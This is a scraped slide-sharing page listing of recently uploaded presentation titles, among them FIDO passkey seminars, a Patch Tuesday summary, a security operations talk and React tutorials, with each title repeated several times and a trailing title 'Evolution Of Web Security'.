Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
Landscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdfLandscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdfAarwolf Industries LLC
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 

Recently uploaded (20)

Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog Presentation
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Infrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platformsInfrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platforms
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
Landscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdfLandscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdf
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 

Evolution Of Web Security